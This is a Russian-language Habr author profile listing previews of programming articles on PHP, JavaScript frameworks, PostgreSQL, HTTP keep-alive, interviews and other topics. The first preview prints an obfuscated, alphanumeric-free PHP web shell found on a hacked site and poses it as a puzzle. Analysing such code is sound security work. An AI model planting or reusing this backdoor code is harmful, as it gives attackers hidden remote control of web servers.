Обновить
25
0
Джагаев Давид@1eon

Пользователь

Отправить сообщение

PHP-шелл без единого буквенно-цифрового символа

Время на прочтение1 мин
Охват и читатели90K
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности

Mobify.js — изменение DOM до начала загрузки ресурсов

Время на прочтение2 мин
Охват и читатели15K
image

Mobyfy.js — открытая библиотека, предназначенная прежде всего для облегчения создания отзывчивых (responsible) сайтов. Основная фишка состоит в так называемом «Capturing API» — позволяющем модифицировать DOM непосредственно ДО начала загрузки браузером ресурсов (скриптов, изображений и т.д.)
Читать дальше →

RFID метка для пельменей

Время на прочтение2 мин
Охват и читатели68K
Здравствуйте, досточтимые леди и джентльмены. Попробуйте угадать, что представлено на фотографии.
image
Это не арт-инсталляция в стиле медицинского техно. Это вполне работоспособное полезное RFID устройство, описание которого представлено ниже.
Читать дальше →

Наглядный жизненный урок

Время на прочтение6 мин
Охват и читатели104K

Когда я переучивал на программистов своих друзей, то заметил интересную вещь. Люди, которые уже где-то работали, переучивались очень охотно. И чем больше был их стаж вне ИТ, тем усерднее они занимались. Те же, кто был еще студентами, иногда откровенно халявили.

Поговорив и с теми и с другими, я заметил, что студенты до последнего верят в «волшебное трудоустройство», которое ждет их сразу после окончания вуза.

Далее, для тех, кто еще не снял розовые очки — гайд по реальному миру.
Добро пожаловать в реальный мир

O Backbone.js очень просто и кратко для любителей MVC-фреймворков

Время на прочтение5 мин
Охват и читатели38K
Об использовании JavaScript-фреймворка Backbone.js написано много, но просто и кратко — мало. Я постараюсь исправить этот недостаток и рассказать разработчикам web-приложений максимально просто, доступно и кратко о том, зачем им может пригодится этот фреймворк и как, в общих чертах, он работает. Профессионалы и специалисты по Backbone.js: можете не тратить время, этот рассказ для новичков. Если быть честным, то для чтения этой заметки не обязательно быть Rails-developer'ом, надеюсь, статья пригодится всем, кто работает с любым из МVC-фреймворком.

Читать дальше →

Http запросы — мы все это делаем неправильно

Время на прочтение3 мин
Охват и читатели191K
В проекте, над которым я работаю, мы используем огромное количество сторонних библиотек. Многие из них — адаптеры для различных сервисов. Что их объединяет, это то, что они работают с сетью. Json поверх http, soap поверх http, какие-то свои протоколы поверх http. Т.е. все так или иначе используют http. И как ни удивительно, мало кто из них пользуется преимуществами его последней версии. Я не поленился заглянуть в википедию, прошло ровно 14 лет как была принята спецификация http 1.1. И потому я решил обратиться с призывом:
image

Да, речь пойдет о keep alive. Суть в том, что, начиная с http 1.1, клиент и сервер могут договориться не закрывать установленное tcp-соединение после завершения запроса, а переиспользовать его для следующих запросов. Это нужно потому, что на установку соединения требуется время. Иногда это время больше, чем время самого запроса. И если все серверы уже давным-давно такую возможность поддерживают, а все браузеры и большинство других клиентов её используют, то у разработчиков различных библиотек для популярных языков программирования здесь почему-то пробел.
Читать дальше →

Обработка pcntl-сигналов в PHP

Время на прочтение8 мин
Охват и читатели25K
Про обработку сигналов в PHP уже было написано несколько статей. Но там эта тема описана лишь косвенно.

Сразу оговорюсь, что я знаю, что уже вышел PHP 5.5 и 5.2 уже морально устарел, но задачу нужно было решать именно на PHP 5.2. Для тех счастливчиков, кто использует более новую версию PHP я тоже напишу, но ближе к концу статьи.

Обработка pcntl-сигналов в PHP делается путем передачи функции-обработчика в функцию pcntl_signal(), при этом на каждый сигнал можно повесить только один обработчик. Каждый следующий обработчик будет заменять предыдущий, при этом никаких нотайсов не будет.
Читать дальше →

Не повторяйте моих ошибок на собеседовании

Время на прочтение5 мин
Охват и читатели358K
image
Я — разработчик с чуть более чем 10 годами опыта разработки и опытом прохождения нескольких раундов собеседований каждый год-два.
Пост написан под впечатлением двух предыдущих постов на смежную тему — Как я искал сотрудников или Как не надо проходить собеседования и Как я искал работу или Как не надо проводить собеседования. И хотя в этих постах освещены наиболее насущные проблемы соискателя и работодателя, рискну высказать свое мнение, которое основано на лично набитых шишках и помогает взглянуть на проблемы под другим углом.

Также рискну обрисовать пути решения проблем, состоящие в том, чтобы поменять то, что можно поменять (в основном — себя), а не то, чего изменить нельзя (скажем, рынок труда).

Ошибка №1
Соискатель получает столько приглашений на собеседование, что не в состоянии их обработать.
Логичный вывод соискателя: «на рынке острый дефицит кадров, так что могу отсеивать компании как хочу, отфутболив тех, кто заикнется о коде на бумажке, сортировках или гномиках». Возможна и менее скромная вариация того же вывода: «раз меня все хотят, значит, я классный профессионал, могу всем диктовать свои условия». Звучит, вроде, логично, но абсолютно бесполезно.

Я предлагаю взглянуть на корень ошибки (да-да, это ошибка). Если соискатель получает слишком много приглашений — значит, он неправильно составил резюме. Ведь именно резюме послужило причиной лавинообразного интереса.
Читать дальше →

Притча о покрытии кода тестами

Время на прочтение2 мин
Охват и читатели42K

Ранним утром программист спросил великого мастера:
— Я готов писать модульные тесты. К какому покрытию кода я должен стремиться?
Великий мастер ответил:
— Не переживай о покрытии, просто пиши хорошие тесты.
Программист улыбнулся, поклонился и ушел.

Немного времени спустя другой программист задала этот же вопрос. Великий мастер указал на котел с кипящей водой и сказал:
— Сколько зерен риса я должен положить в этот котел?
Программист с озадаченным видом ответила:
— Как я могу ответить наверняка? Все зависит от того, сколько людей вам надо накормить, насколько они голодны, какие еще блюда вы подаете, сколько риса у вас есть и от многого другого.
— Совершенно верно. — сказал великий мастер.
Второй программист улыбнулась, поклонилась и ушла.
В конце дня...

Программирование, быстрое и медленное: разработчики и психология самоуверенности

Время на прочтение10 мин
Охват и читатели52K
Сегодня я собираюсь рассказать о том, что происходит в головах разработчиков программ, в тот момент, когда они делают предварительные расчеты; о том, почему им так сложно зафиксировать все задумки в своей голове; а также о том, как лично я разрешил для себя эту ситуацию, узнал, как жить и писать ПО (для счастливых владельцев бизнеса), но, уверен, мои собственные оценки трудоемкости ненадежны как никогда.

Но сначала история…

Это было <вставьте период времени, который не будет делать меня нелепо старым> в то время, когда я был молодым разработчиком (1). В колледже я был лучшим на занятиях по программированию, будучи младшим разработчиком, я мог взломать код и решить любую поставленную передо мной задачу быстрее, чем кто-либо ожидал. За выходные я мог изучить новый язык и продуктивно на нем работать (или, по крайней мере, мне так тогда казалось).

Таким образом, как и должно было произойти, у меня появился свой собственный проект. Менеджер по работе с крупными клиентами объяснил мне в общих чертах, чего хочет клиент, мы это обсудили, и я сказал: «На эту работу уйдет 3 недели.» «Хорошо», — ответил он. И так я приступил к программированию.

Как вы думаете, сколько времени у меня ушло на этот проект? Четыре недели? Может быть пять?

Мм, вообще-то: три месяца.

У меня остались четкие воспоминания о том времени – мое представление о себе было тесно связано с ощущением, что я — «хороший программист», в чем я сильно разочаровался. Я потерял сон, у меня случались небольшие приступы паники. И этому Не Было Конца. Я помню, что у меня сосало под ложечкой при разговоре с тем менеджером, я снова и снова объяснял, что у меня до сих пор нет ничего, что можно ему показать.

В один из таких черных периодов я решил, что Больше Никогда Не Буду Совершать Подобных Ошибок.

К сожалению, в ходе своей карьеры, я уяснил нечто очень тяжелое: я постоянно совершаю подобные ошибки.
Читать дальше →

Скринкаст по Node.JS

Время на прочтение2 мин
Охват и читатели11K
Всем привет!

Если вы — разработчик, то вам наверняка известно: большинство полезной документации и скринкастов делается на английском.

Конечно, даже на английском много всего устаревшего, приходится порыться, но на русском — всё гораздо хуже. Многого просто нет.

Хотелось бы поменять эту ситуацию, с вашей помощью, хотя бы в плане Node.JS. Если проект будет успешен, то, возможно, и не только.



Читать дальше →

Вы опасно некомпетентны в криптографии

Время на прочтение7 мин
Охват и читатели144K
От переводчика: Хоть посыл статьи Najaf Ali, переведённой ниже, и носит слегка рекламный оттенок («оставьте криптографию нам, экспертам»), но описанные в ней примеры показались мне довольно интересными и заслуживающими внимания.
Кроме того, никогда не будет лишним повторить прописную истину: не придумывайте свою крипто-защиту. И эта статья отлично иллюстрирует почему.

Читать дальше →

AngularJs. Отложенная загрузка модулей

Время на прочтение5 мин
Охват и читатели34K
AngularJs – великолепный фреймворк для разработки web-приложений. Разработка бизнес-логики приложения полностью отделена от сопутствующей суеты вокруг DOM. Angular модульный – это замечательно, но так же является источником проблемы. Количество модулей быстро растёт. И если директивы ещё можно упаковывать в отдельные пакеты типа angular-ui, то с контроллёрами бизнес-логики всё сложнее. Всё становится ещё хуже, когда требования безопасности в принципе запрещают загрузку на клиента контроллёров с бизнес-логикой, которые недоступны текущему пользователю. При развитой ролевой системе доступа к приложению масштаб проблемы становится очевиден.
Решение

Как попасть в «золотой миллиард» или отрезвляющая статистика

Время на прочтение1 мин
Охват и читатели207K
Рассматривая всевозможные списки Forbes, цены на квартиры в Москве или просто ценник нового Galaxy S4, легко впасть в уныние – кто-то же это все покупает. Причем в легкую, не парясь, не то что я. Проблема в том, что это все навязанная картина мира (не пугайтесь, пафоса в моем топике будет немного).

Существует такое понятие как «золотой миллиард». Это одна седьмая часть населения планеты, потребляющая большую часть ресурсов и обеспеченная базовыми удобствами. То есть еще раз, 6 миллиардов людей на планете живут хуже. Значительно хуже. Для того, чтобы понять, каков порог вхождения в этот «миллиард» можно воспользоваться сайтом статистики Global Rich List. Выбираем валюту, вводим либо годовой доход, либо накопленное состояние, и позиционируем себя на мировом финансовом поле.

Читать дальше →

Масштабирование производительности PostgreSQL с помощью партицирования таблиц

Время на прочтение13 мин
Охват и читатели33K

Классический сценарий


Вы работаете над проектом, где транзакционные данные хранятся в базе данных. Затем вы развёртываете приложение в рабочей среде, и производительность великолепна! Запросы проходят шустро, и задержка при их вводе практически незаметна. Через несколько дней/недель/месяцев база данных становится всё больше и больше, и скорость запросов замедляется.

Есть несколько подходов, с помощью которых можно ускорить работу вашего приложения и базы данных.

Администратор базы данных (DBA) посмотрит и проследит, чтобы база данных была оптимально настроена. Он предложит добавить определённые индексы, убрать логирование на отдельную партицию, подправить параметры движка базы данных и убедиться, что база данных здорова. Можно также добавить выделенных IOPS (Input/Output Operations Per second) на EBS диске, чтобы увеличить скорость дисковых партиций. Это даст вам выиграть время и даст возможность решить главную проблему.

Рано или поздно вы поймёте, что данные в вашей базе данных являются узким местом (botleneck).
В базах данных многих приложений важность информации уменьшается со временем. Если вы сможете придумать способ избавиться от этой информации, ваши запросы будут проходить быстрее, время создания бэкапов уменьшится, и вы сэкономите кучу места. Вы можете удалить эту информацию, однако тогда она пропадёт безвозвратно. Вы можете послать множество DELETE запросов, вызвав создание тонн логов, и использовать кучу ресурсов движка базы данных. Так как же мы избавимся от старой информации эффективно, но не потеряв её навсегда?
В примерах мы будем использовать PostgreSQL 9.2 на Engine Yard. Вам также нужен git для установки plsh.

Читать дальше →

Управление растущими нагрузками в Postgres: 5 советов от Instagram

Время на прочтение5 мин
Охват и читатели28K
С тех пор как число активных пользователей Instagram стало постоянно расти, Postgres оставался нашим надежным фундаментом и неизменным хранилищем данных для большинства данных, создаваемых пользователями. И хотя меньше года назад мы писали о том, как мы храним большое количество данных на Instagram при 90 лайках в секунду, сейчас мы обрабатываем более 10000 лайков в секунду – и наша основная технология хранения данных не изменилась.

За последние два с половиной года, мы поняли несколько вещей и подобрали пару инструментов для масштабирования Postgres и мы хотим ими поделиться – то, что мы хотели бы знать при запуске Instagram. Некоторые из них специфичны для Postgres, другие представлены также и в других базах данных. Чтобы знать, как мы горизонтально масштабируем Postgres, смотрите наш пост Sharding and IDs at Instagram

Узнать больше

Table bloat? Не, не слышал…

Время на прочтение3 мин
Охват и читатели59K


Думаю многим известна особенность PostgreSQL, которая приводит к эффекту раздувания таблиц, или table bloat. Известно что она проявляет себя в случаях интенсивного обновления данных, как при частых UPDATE так и при INSERT/DELETE операциях. В результате такого раздувания снижается производительность. Рассмотрим почему это происходит и как с этим можно бороться.
что?

Хинты планера в PostgreSQL

Время на прочтение8 мин
Охват и читатели66K
Известно, что SQL — декларативный язык, который указывает, «что» мы хотим выбрать из базы, а «как» это сделать — СУБД решает сама. Задачу выбора для SQL-запроса конкретного способа его выполнения(плана) решает планировщик запросов, который есть практически в любой СУБД. Но иногда он выбирает не самый лучший план. Многие коммерческие СУБД предоставляют на этот случай «хинты», которые позволяют в ручном режиме подсказывать базе, как лучше выполнить запрос. В Open Source СУБД PostgreSQL такого механизма не было.

И вот, наконец, случилось то, о чем многие мечтали и чего уже устали ждать, а другие боялись. Японские разработчики из NTT реализовали хинты планера PostgreSQL. Причем, им удалось это сделать, не меняя ядро, в виде отдельного модуля pg_hint_plan, поддерживающего версии PostgreSQL 9.1 и 9.2. Модуль реализует хинты, позволяющие устанавливать методы сканирования и соединения таблиц, установку значений GUC. За деталями установки и использования добро пожаловать под кат.

Читать дальше →

Утилизация картриджей HP: жестокая реальность

Время на прочтение3 мин
Охват и читатели101K
После написания поста «Несоотвествие действительности в рекламе оригинальных картриджей HP» мне удалось связаться с Сергеем Troublesellerом — автором видео, которое я использовал для привлечения внимания. Оказалось, что это видео демонстрирует реальную процедуру уничтожения картриджей по программе бесплатной утилизации HP. Продублирую этот ролик и здесь:


При дроблении картриджей в дробильно-сортировальном комплексе произошел взрыв из-за мелкодисперсного тонера (порошка) и как следствие — пожар

Вот, что еще рассказал и показал мне Сергей:

Информация

В рейтинге
Не участвует
Откуда
Харьков, Харьковская обл., Украина
Зарегистрирован
Активность